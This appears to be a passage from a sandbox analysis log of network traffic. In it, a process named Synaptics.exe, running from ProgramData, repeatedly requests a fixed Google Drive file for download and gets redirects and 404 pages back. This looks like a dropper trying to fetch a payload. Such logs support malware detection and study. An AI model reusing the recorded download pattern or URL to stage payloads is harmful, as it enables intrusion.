                                                                                                                    2025-01-07 12:18:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 63 54 47 52 6f 77 73 75 2d 76 61 79 63 5f 63 59 4d 32 67 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="gcTGRowsu-vayc_cYM2gcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.1149831142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6F5WUlqGPCruTCsSnHqN7pRQmYRRKqHFApds3eZOlrduui5CHpVseprB0EFMJGzi46
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:36 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZvOTkauHlWm1dBpuMdT5Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 6f 33 77 61 31 47 67 58 5a 2d 79 63 55 49 46 69 49 58 35 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="0o3wa1GgXZ-ycUIFiIX5Tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.1149840142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JYHIbphfk5VDWu8dTd-n6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.1149841142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:36 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QzjP1sO6S6Mp2ngDV4xang' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.1149842142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6fjW79sMfd1HlUfT-MEXFhe4qPQ27GWsVwFOoxyb5FqGrulKmtpHxCkk2oCpEg4dMF5DRsOmM
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Ct9D7YgvO5V7GKRak1rSAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2025-01-07 12:18:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 6f 74 78 69 6b 34 54 51 38 65 43 43 74 7a 55 73 79 34 69 50 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="7otxik4TQ8eCCtzUsy4iPA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2025-01-07 12:18:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.1149843142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7jhPuA0J95js8FDmgC7duCyXj-lWiC5Ip5lkvfsF-1xpoMkD_qoKNHuBipEvY4hPp3
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:37 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uzHOJLaF6rlpMxcTIFlrSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 5f 44 57 4b 75 4e 56 4c 2d 2d 5f 45 53 63 38 6f 50 33 55 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="O_DWKuNVL--_ESc8oP3Uuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.1149856142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:38 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7_oTww3mIe1EfNf3TQ-8zcPJ3aQ-KG6Naed04EJUjPoAUj2AYR35vdqpJdmI4IVvGm
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:38 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zUCoA0qSCHe1Z6UOQmmlMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:38 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
